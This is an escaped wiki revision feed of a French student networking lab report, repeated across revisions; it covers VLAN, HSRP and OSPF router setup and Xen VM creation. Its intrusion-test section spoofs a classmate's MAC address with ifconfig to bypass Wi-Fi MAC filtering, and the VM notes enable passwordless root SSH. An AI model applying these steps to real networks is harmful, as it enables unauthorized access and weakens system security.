----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22765</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22765"/>
				<updated>2015-11-06T09:42:02Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22697</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22697"/>
				<updated>2015-11-03T21:58:36Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt; 1ère Étape : La configuration du routeur &amp;lt;/h2&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
